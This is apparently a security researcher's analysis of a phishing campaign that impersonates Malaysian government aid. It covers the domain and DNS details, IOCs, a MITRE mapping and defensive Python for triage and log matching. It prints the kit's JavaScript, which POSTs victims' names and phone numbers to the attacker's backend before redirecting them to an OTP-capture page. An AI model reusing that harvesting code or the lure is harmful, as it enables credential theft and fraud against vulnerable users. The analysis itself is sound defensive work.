# Phishing Campaign Analysis: “Laptop Percuma / Bantuan E-Wallet” Scam

> Date: 14 March 2026
>
> Target URL: `http://bantuan-malay[.]biz[.]id/66/`
>
> Threat Type: Phishing / Social Engineering / Credential Harvesting
>
> Target Theme: Malaysian Government Assistance (E-Wallet / Laptop Program)

## <mark style="background-color:blue;">Executive Summary</mark>

A phishing campaign targeting Malaysian users was identified. The campaign spreads via a social engineering message claiming that registration for a free laptop program for students (“Laptop Percuma”) has opened.

However, victims who click the link are redirected to a fake Bantuan E-Wallet eligibility verification page that attempts to harvest personal information including the victim’s name and phone number.

Infrastructure analysis revealed that the phishing domain is recently registered and is protected by Cloudflare reverse proxy services, while victim data is transmitted to an external backend server hosted on `xwasq[.]com`.

Additional threat intelligence indicates the phishing template is reused across multiple domains impersonating Malaysian government assistance programs, suggesting a broader phishing campaign.

## <mark style="background-color:blue;">Discovery</mark>

The phishing activity was discovered through a suspicious message distributed on the messaging platform Telegram. The message contained a phishing link and promoted a program described as: "Pendaftaran program Laptop percuma untuk pelajar dibuka hari ini."

<figure><img src="/files/HvZ6thDTyaJui45dcf9c" alt="" width="288"><figcaption></figcaption></figure>

<p align="center"><em>Figure 1:</em> <em>Telegram message containing Phishing Link</em></p>

The wording indicates that the campaign specifically targets students, particularly those who may not be able to afford a laptop. By leveraging the promise of free devices, the threat actor attempts to exploit financial vulnerability and increase the likelihood that recipients will click the provided link.

After accessing the link, victims are redirected to a phishing website presenting itself as a government assistance eligibility verification portal.

## <mark style="background-color:blue;">Infrastructure and Threat Intelligence</mark>

### Domain Infrastructure

<table><thead><tr><th width="262.800048828125">Attribute</th><th>Value</th></tr></thead><tbody><tr><td>Domain</td><td><code>bantuan-malay[.]biz[.]id</code></td></tr><tr><td>Registrar</td><td>PT Dewabisnis Digital Indonesia</td></tr><tr><td>Creation Date</td><td>2026-03-01</td></tr><tr><td>Expiry Date</td><td>2027-03-01</td></tr><tr><td>Domain Age</td><td>~11 days</td></tr></tbody></table>

Recently registered domains are a common indicator of phishing infrastructure.

### DNS and Hosting

<table><thead><tr><th width="262.79998779296875">Attribute</th><th>Value</th></tr></thead><tbody><tr><td>A</td><td><code>104.21.78.24</code> , <code>172.67.215.26</code></td></tr><tr><td>AAAA</td><td><code>2606:4700:3032::6815:4e18</code> , <code>2606:4700:3037::ac43:d71a</code></td></tr><tr><td>Name Servers</td><td><code>titan.ns.cloudflare.com</code> , <code>heidi.ns.cloudflare.com</code></td></tr><tr><td>Start of Authority</td><td><code>heidi.ns.cloudflare.com</code></td></tr></tbody></table>

These IP addresses belong to Cloudflare Inc. (AS13335). Cloudflare is acting as a **reverse proxy**, hiding the real hosting server.
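The two infrastructure signals used above (a domain only days old, and a zone delegated to Cloudflare name servers whose every published address falls inside Cloudflare's proxy ranges) are easy to automate as a triage check. The following is an added example, not tooling from the original report: the `DomainRecord` structure, the 30-day threshold, the prefix subset and the lookup date are assumptions, while the sample values are taken from the Domain Infrastructure and DNS tables in this report.

```python
"""Triage a domain for the two infrastructure signals this report relies on:
very recent registration and Cloudflare reverse-proxying that hides the
origin host.  Added example, not part of the original report."""
from __future__ import annotations

from dataclasses import dataclass, field
from datetime import date
from ipaddress import ip_address, ip_network

NEW_DOMAIN_DAYS = 30  # assumed triage threshold for "recently registered"

# Assumption: an illustrative subset of Cloudflare (AS13335) prefixes, not the
# authoritative list; a production check would pull Cloudflare's published list.
CLOUDFLARE_PREFIXES = [ip_network(p) for p in (
    "104.16.0.0/13", "172.64.0.0/13", "2606:4700::/32",
)]


@dataclass
class DomainRecord:
    domain: str
    creation_date: date
    registrar: str
    name_servers: list[str] = field(default_factory=list)
    addresses: list[str] = field(default_factory=list)  # A and AAAA records


def domain_age_days(rec: DomainRecord, observed: date) -> int:
    return (observed - rec.creation_date).days


def is_cloudflare_proxied(rec: DomainRecord) -> bool:
    """True when the zone is delegated to Cloudflare name servers *and* every
    published address sits in a Cloudflare prefix, i.e. the origin is hidden."""
    if not rec.name_servers or not rec.addresses:
        return False
    ns_ok = all(ns.lower().rstrip(".").endswith(".ns.cloudflare.com")
                for ns in rec.name_servers)
    ip_ok = all(any(ip_address(a) in net for net in CLOUDFLARE_PREFIXES)
                for a in rec.addresses)
    return ns_ok and ip_ok


def triage(rec: DomainRecord, observed: date) -> dict:
    """Collect the indicators for one domain; each one adds to a simple score."""
    findings = []
    age = domain_age_days(rec, observed)
    if age < NEW_DOMAIN_DAYS:
        findings.append(f"registered {age} days ago")
    if is_cloudflare_proxied(rec):
        findings.append("origin hidden behind Cloudflare reverse proxy")
    return {"domain": rec.domain, "age_days": age,
            "findings": findings, "score": len(findings)}


# Values from the report's Domain Infrastructure and DNS tables.
PHISHING_DOMAIN = DomainRecord(
    domain="bantuan-malay[.]biz[.]id",
    creation_date=date(2026, 3, 1),
    registrar="PT Dewabisnis Digital Indonesia",
    name_servers=["titan.ns.cloudflare.com", "heidi.ns.cloudflare.com"],
    addresses=["104.21.78.24", "172.67.215.26",
               "2606:4700:3032::6815:4e18", "2606:4700:3037::ac43:d71a"],
)
# Assumed lookup date; the report gives the age as roughly 11 days.
LOOKUP_DATE = date(2026, 3, 12)

# Constructed control case: an old domain on non-Cloudflare name servers.
CONTROL_DOMAIN = DomainRecord(
    domain="example.com", creation_date=date(2015, 6, 1),
    registrar="Example Registrar",
    name_servers=["ns1.example.net"], addresses=["203.0.113.10"],
)

if __name__ == "__main__":
    for rec in (PHISHING_DOMAIN, CONTROL_DOMAIN):
        print(triage(rec, LOOKUP_DATE))
```

Neither signal is proof on its own (plenty of legitimate sites are new or sit behind Cloudflare), which is why the check reports a score rather than a verdict; the point is that the combination, together with the lure, is what justified pulling the page source apart.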

### Backend Infrastructure

The phishing page sends collected data to: `https://xwasq[.]com/terkini6/send_otp`

#### Backend Domain Details

<table><thead><tr><th width="262.79998779296875">Attribute</th><th>Value</th></tr></thead><tbody><tr><td>Domain</td><td><code>xwasq[.]com</code></td></tr><tr><td>Registrar</td><td>Web Commerce Communications Ltd (WebNIC)</td></tr><tr><td>IP Address</td><td><code>103.163.138.21</code></td></tr><tr><td>Location</td><td>Indonesia</td></tr><tr><td>Registrant Name</td><td>Budak Lhepak</td></tr><tr><td>Registrant Location</td><td>Malang, Indonesia</td></tr><tr><td>Registrant Email</td><td>lhepakbudak@gmail[.]com</td></tr></tbody></table>

### Phishing Infrastructure

To identify related phishing infrastructure, a search was performed using URLScan based on the page hash, which revealed multiple domains hosting similar phishing templates.

<figure><img src="/files/usNCYAoW590emN5PDW6c" alt=""><figcaption></figcaption></figure>

<p align="center"><em>Figure 2: URLScan search results revealing multiple related phishing domains impersonating Malaysian assistance programs</em></p>

{% hint style="info" %}
This suggests the threat actor may be operating a phishing kit deployed across multiple domains targeting Malaysian users.
{% endhint %}

## <mark style="background-color:blue;">Technical Analysis</mark>

### Phishing Page

<figure><img src="/files/mOQUzQJkFddqYLVYgdfy" alt=""><figcaption></figcaption></figure>

<p align="center"><em>Figure 3: Main Landing Page</em></p>

<figure><img src="/files/Nf182AfrEJ2ctio6IovS" alt=""><figcaption></figcaption></figure>

<p align="center"><em>Figure 4: Name &amp; phone number input of Landing Page</em></p>

<figure><img src="/files/gJC3m1RamRKaEOkXHLSy" alt=""><figcaption></figcaption></figure>

<p align="center"><em>Figure 5: Verification of Landing Page</em></p>

{% hint style="info" %}
The page visually mimics government assistance portals to increase credibility.
{% endhint %}

### Attack Flow Diagram

```
┌───────────────────────────┐
│       Threat Actor        │
│ Creates phishing domain   │
│ & phishing kit            │
└─────────────┬─────────────┘
              │
              │ Distributes phishing message
              │ "Laptop Percuma untuk pelajar"
              ▼
┌───────────────────────────┐
│          Victim           │
│ Receives phishing link    │
│ via social media / chat   │
└─────────────┬─────────────┘
              │
              │ Clicks malicious link
              ▼
┌───────────────────────────┐
│  Phishing Landing Page    │
│ bantuan-malay[.]biz[.]id  │
│ Fake Bantuan E-Wallet     │
│ verification portal       │
└─────────────┬─────────────┘
              │
              │ Victim submits information
              │ (Full name + phone number)
              ▼
┌───────────────────────────┐
│   Backend Data Server     │
│       xwasq[.]com         │
│   Receives victim data    │
└─────────────┬─────────────┘
              │
              │ Redirect victim
              ▼
┌───────────────────────────┐
│     OTP Verification      │
│         code.php          │
│ Attempts to capture OTP   │
└─────────────┬─────────────┘
              │
              ▼
┌───────────────────────────┐
│       Threat Actor        │
│ Uses collected data for   │
│ fraud / identity theft    │
└───────────────────────────┘
```

### Code Analysis

Inspection of the phishing page source code reveals the mechanism used to collect victim information and transmit it to the attacker-controlled backend infrastructure.

The form collects the following information from the victim:

| Field    | Description                                          |
| -------- | ---------------------------------------------------- |
| fullName | Victim’s full name (claimed to match MyKad identity) |
| phone    | Victim’s Telegram phone number                       |

The JavaScript code then sends the captured data to a remote server using an **AJAX POST request**.

Code observed in the page source:

```javascript
$.ajax({
    url: endpointUrl + "/send_otp",          // attacker backend, see phpSettings below
    type: "POST",
    contentType: "application/json",
    data: JSON.stringify({
        phone: "+60" + phone,                // Malaysian country code prepended to the entered number
        fullName: $("#fullName").val()
    }),
})
```

The destination endpoint is defined in the JavaScript configuration:

```javascript
var phpSettings = {
    endpointUrl: 'https://xwasq.com/terkini6'
};
```

This indicates that victim data is transmitted to the following backend API:

```
https://xwasq[.]com/terkini6/send_otp
```

After successful submission, the victim is redirected to another page:

```
code.php
```

This behavior suggests the phishing kit attempts to simulate a **verification process**, likely intended to capture **OTP codes or further authentication information** from victims.
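The fragments above (the `phpSettings.endpointUrl` config, the `$.ajax` POST to `/send_otp` with a hard-coded `+60` prefix, the `code.php` redirect and the page title) make a usable fingerprint for a saved copy of the page. The following scanner is an added example and not tooling from the report: the embedded sample HTML reproduces only the fragments quoted in this section plus one constructed `success` handler standing in for the described redirect, and the fingerprint and function names are assumptions.

```python
"""Fingerprint a saved landing page for the kit behaviour this report documents.
Added example, not the report's tooling."""
import re

# Constructed sample: the fragments quoted in the report, plus one constructed
# success handler that performs the code.php redirect the report describes.
SAMPLE_HTML = """<html><head>
<title>BANTUAN E-WALLET - SEMAKAN STATUS</title>
<meta name="description" content="SEMAKAN STATUS KELAYAKAN BANTUAN E-WALLET">
</head><body>
<h2>SILA ISI MAKLUMAT DENGAN BETUL</h2>
<input id="fullName"><input id="phone">
<script>
var phpSettings = {
    endpointUrl: 'https://xwasq.com/terkini6'
};
var endpointUrl = phpSettings.endpointUrl;
$.ajax({
    url: endpointUrl + "/send_otp",
    type: "POST",
    contentType: "application/json",
    data: JSON.stringify({
        phone: "+60" + phone,
        fullName: $("#fullName").val()
    }),
    success: function () { window.location.href = "code.php"; }
});
</script></body></html>"""

# Each fingerprint is a regex over raw page source; the names are assumptions.
FINGERPRINTS = {
    "title_semakan_status": re.compile(
        r"<title>\s*BANTUAN E-WALLET\s*-\s*SEMAKAN STATUS\s*</title>", re.I),
    "ui_text_sila_isi": re.compile(r"SILA ISI MAKLUMAT DENGAN BETUL"),
    "post_send_otp": re.compile(r'url:\s*\w+\s*\+\s*["\']/send_otp["\']'),
    "hardcoded_my_prefix": re.compile(r'"\+60"\s*\+\s*phone'),
    "redirect_code_php": re.compile(r'["\']code\.php["\']'),
}
ENDPOINT_RE = re.compile(r"""endpointUrl\s*:\s*['"]([^'"]+)['"]""")


def defang_url(url: str) -> str:
    """Defang only the host part, matching the report's own notation."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return f"{scheme}://{host.replace('.', '[.]')}{sep}{path}"


def extract_exfil_endpoint(html: str):
    """Recover where the form data is POSTed: endpointUrl + '/send_otp'."""
    m = ENDPOINT_RE.search(html)
    return m.group(1).rstrip("/") + "/send_otp" if m else None


def scan_page(html: str) -> dict:
    matched = [name for name, rx in FINGERPRINTS.items() if rx.search(html)]
    endpoint = extract_exfil_endpoint(html)
    if endpoint and len(matched) >= 3:
        verdict = "kit match"
    elif endpoint or matched:
        verdict = "suspicious"
    else:
        verdict = "no match"
    return {"verdict": verdict, "matched": matched,
            "exfil_endpoint": defang_url(endpoint) if endpoint else None}


if __name__ == "__main__":
    print(scan_page(SAMPLE_HTML))
```

Because the kit is reused across domains (see the URLScan results earlier), the fingerprints that survive a domain change are the ones worth keeping: the `send_otp` POST shape, the `+60` prefix logic and the `code.php` redirect travel with the template, whereas the `endpointUrl` value is the part most likely to differ between deployments and is therefore extracted rather than matched.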

## <mark style="background-color:blue;">MITRE ATT\&CK Mapping</mark>

| Technique             | ID    | Description                        |
| --------------------- | ----- | ---------------------------------- |
| Phishing              | T1566 | Social engineering lure            |
| Masquerading          | T1036 | Impersonation of government aid    |
| Credential Harvesting | T1056 | Collection of personal information |
| Proxy Infrastructure  | T1090 | Use of Cloudflare as reverse proxy |
| Exfiltration Over Web | T1041 | Data sent to attacker server       |

## <mark style="background-color:blue;">Indicators of Compromise (IOCs)</mark>

### Network IOCs

| Indicator Type | Value                                | Description                     |
| -------------- | ------------------------------------ | ------------------------------- |
| URL            | `http://bantuan-malay[.]biz[.]id/66/` | Main phishing landing page      |
| Domain         | `bantuan-malay[.]biz[.]id`           | Phishing domain                 |
| Domain         | `xwasq[.]com`                        | Backend data collection server  |
| IP Address     | `104.21.78.24`                       | Cloudflare proxy IP             |
| IP Address     | `172.67.215.26`                      | Cloudflare proxy IP             |
| IP Address     | `103.163.138.21`                     | Backend phishing infrastructure |

### Content IOCs

<table><thead><tr><th width="262.800048828125">Type</th><th>Value</th></tr></thead><tbody><tr><td>Page title</td><td>BANTUAN E-WALLET - SEMAKAN STATUS</td></tr><tr><td>Metadata</td><td>SEMAKAN STATUS KELAYAKAN BANTUAN E-WALLET</td></tr><tr><td>UI text</td><td>SILA ISI MAKLUMAT DENGAN BETUL</td></tr><tr><td>API endpoint</td><td><code>send_otp</code></td></tr><tr><td>Redirect page</td><td><code>code.php</code></td></tr></tbody></table>

### Behavioral IOCs

| Behavior                    | Description                |
| --------------------------- | -------------------------- |
| POST to `/send_otp`         | Victim phone harvesting    |
| Redirect to `code.php`      | OTP harvesting attempt     |
| Cloudflare proxy usage      | Infrastructure concealment |
| Mismatch lure vs page theme | Phishing kit reuse         |

## <mark style="background-color:blue;">Recommendations</mark>

Users and organizations should take the following actions when encountering phishing campaigns similar to the one described in this investigation.

### Report the Phishing Domain

If you encounter the phishing URL identified in this report, consider reporting it to the relevant service providers to help prevent further victimization.

Possible reporting channels include:

1. [Google Safe Browsing](https://safebrowsing.google.com/safebrowsing/report_phish/)
2. [MyCERT (Cyber999)](https://www.mycert.org.my/portal/full?id=9eb77829-7dd4-4180-814f-de3a539b7a01)

<figure><img src="/files/b2COPoFpMPkaO27xtUq2" alt=""><figcaption></figcaption></figure>

<p align="center"><em>Figure 6: Phishing domain successfully reported to Google Safe Browsing</em></p>

### User Safety Recommendations

Users should:

* Avoid clicking unsolicited links promising financial assistance
* Verify government aid programs through official websites
* Avoid submitting personal information on unknown websites

Organizations should:

* Block the phishing domain at DNS or firewall level
* Monitor network traffic for connections to identified IOCs
* Educate users about social engineering tactics
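The two organizational actions (blocking at the DNS level and watching traffic for the listed IOCs) can be turned into a small matcher. What follows is an added example rather than anything from the report: the log format and sample lines are constructed, the decision to block the dedicated backend address but only alert on the two shared Cloudflare edge addresses is an assumption, and the IOC values are copied from the Network IOCs table above. It also goes slightly beyond the page by showing the subdomain and path edge cases a naive substring match gets wrong.

```python
"""Match this report's network IOCs against DNS and web-proxy log lines and
emit DNS RPZ block records.  Added example, not the report's tooling."""
from __future__ import annotations

import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# IOCs copied from the report, kept defanged until use.
IOC_DOMAINS = {
    "bantuan-malay[.]biz[.]id": "phishing landing domain",
    "xwasq[.]com": "backend data collection server",
}
# Assumption: only the dedicated backend IP is blocked outright; the two
# Cloudflare addresses are shared CDN edges, so a hit there is alerted on
# rather than blocked to avoid collateral damage.
IOC_IPS = {
    "103.163.138.21": ("block", "backend phishing infrastructure"),
    "104.21.78.24": ("alert", "Cloudflare proxy IP"),
    "172.67.215.26": ("alert", "Cloudflare proxy IP"),
}

# Constructed log format: "<timestamp> <client> <dns|proxy> <name-or-URL>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<kind>dns|proxy)\s+(?P<target>\S+)$")

# Constructed sample lines; the last three are deliberate near-misses/edge cases.
SAMPLE_LOGS = """\
2026-03-14T09:12:01Z 10.0.5.23 dns bantuan-malay.biz.id
2026-03-14T09:12:02Z 10.0.5.23 proxy http://bantuan-malay.biz.id/66/
2026-03-14T09:12:40Z 10.0.5.23 proxy https://xwasq.com/terkini6/send_otp
2026-03-14T09:13:00Z 10.0.5.23 proxy https://103.163.138.21/
2026-03-14T09:14:00Z 10.0.7.9 dns notxwasq.com
2026-03-14T09:15:00Z 10.0.7.9 proxy https://docs.example.com/bantuan-malay.biz.id
2026-03-14T09:16:00Z 10.0.7.9 dns cdn.xwasq.com
"""


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


def host_of(target: str) -> str:
    """Hostname part of a URL, or the bare name for a DNS query."""
    if "://" in target:
        return (urlsplit(target).hostname or "").lower()
    return target.lower().rstrip(".")


def domain_hit(host: str, ioc_domain: str) -> bool:
    """Exact or subdomain match, never a substring match, so a URL path or a
    look-alike such as notxwasq.com does not trigger."""
    ioc = refang(ioc_domain).lower()
    return host == ioc or host.endswith("." + ioc)


def classify(target: str):
    host = host_of(target)
    for ioc, desc in IOC_DOMAINS.items():
        if domain_hit(host, ioc):
            return {"ioc": ioc, "action": "block", "desc": desc}
    try:
        addr = ip_address(host)
    except ValueError:
        return None
    for ioc, (action, desc) in IOC_IPS.items():
        if addr == ip_address(ioc):
            return {"ioc": ioc, "action": action, "desc": desc}
    return None


def match_logs(text: str) -> list[dict]:
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m["target"])
        if verdict:
            hits.append({"ts": m["ts"], "src": m["src"], "kind": m["kind"], **verdict})
    return hits


def rpz_records() -> list[str]:
    """DNS RPZ entries returning NXDOMAIN (CNAME .) for each IOC domain and
    its subdomains, suitable for a BIND/Unbound response-policy zone."""
    out = []
    for ioc in IOC_DOMAINS:
        d = refang(ioc)
        out.append(f"{d} CNAME .")
        out.append(f"*.{d} CNAME .")
    return out


if __name__ == "__main__":
    for h in match_logs(SAMPLE_LOGS):
        print(f"{h['ts']} {h['src']} {h['action'].upper():5} {h['ioc']} ({h['desc']})")
    print("\n".join(rpz_records()))
```

Matching on the hostname rather than the raw line is what keeps the `docs.example.com/bantuan-malay.biz.id` line quiet while still catching `cdn.xwasq.com`; the wildcard RPZ record covers the same subdomain case on the blocking side.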

## <mark style="background-color:blue;">Conclusion</mark>

This investigation uncovered an active phishing campaign targeting Malaysian users by impersonating government assistance programs.

Key findings include:

* Use of recently registered phishing domains
* Infrastructure hidden behind Cloudflare
* External data exfiltration server
* Reuse of phishing templates across multiple campaigns

The mismatch between **“Laptop Percuma” messaging and an “E-Wallet assistance” landing page** strongly suggests the attacker is **reusing a phishing kit across different scam campaigns**.

Users should avoid interacting with unsolicited aid program links and verify any government assistance announcements through official sources.
